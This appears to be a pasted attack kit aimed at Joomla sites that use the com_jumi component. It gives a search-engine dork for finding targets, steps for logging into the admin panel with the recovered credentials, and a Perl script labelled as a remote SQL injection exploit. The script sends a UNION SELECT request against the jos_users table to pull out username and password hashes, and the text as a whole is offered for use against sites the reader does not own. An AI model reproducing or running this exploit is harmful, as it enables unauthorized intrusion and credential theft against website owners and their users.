dutchman

1.  
2. inurl:"com_joomi"
3.  
4. dork is here
5.  
6. script is here save it joomla.pl
7.  
8. run the script and paste link
9. then u find hashed password
10. admin panel>>>>>site.com/administrator/
11. user::admin
12. pass::hashed pass
13.  
14.  
15.  
16.  
17.  
18. #!/usr/bin/perl -w
19.  
20. ########################################
21. #[~] Author : Muwafaq Lee
22. #[!] exploit Name: Joomla com_jumi
23. ########################################
24. print "tt \n\n";
25. print "tt GH Injector | Ghana Attacker \n\n";
26. print "tt \n\n";
27. print "tt Joomla com_jumi Remote SQL Injection Exploit \n\n";
28. use LWP::UserAgent;
29. print " Target page:[http://wwww.site.com/path/]: ";
30. chomp(my $target=<STDIN>);
31. $dzmind="concat(username,0x3a,password)";
32. $sakkure="jos_users";
33. $com="com_jumi";
34. $cw="+UNION+SELECT+";
35. $b = LWP::UserAgent->new() or die "Could not initialize browser\n";
36. $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
37. $host = $target . "/index.php?option=".$com."&fileid=93&Itemid=117".$cw."1,".$dzmind.",3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24+from/**/".$sakkure."+--+";
38. $res = $b->request(HTTP::Request->new(GET=>$host));
39. $answer = $res->content; if ($answer =~/([0-9a-fA-F]{32})/){
40. print "\n[+] Admin Account : $1\n\n";
41. print "# Successfully Injected #\n\n";
42. }
43. else{print "\n[-] Exploit Failed :( \n";
44. }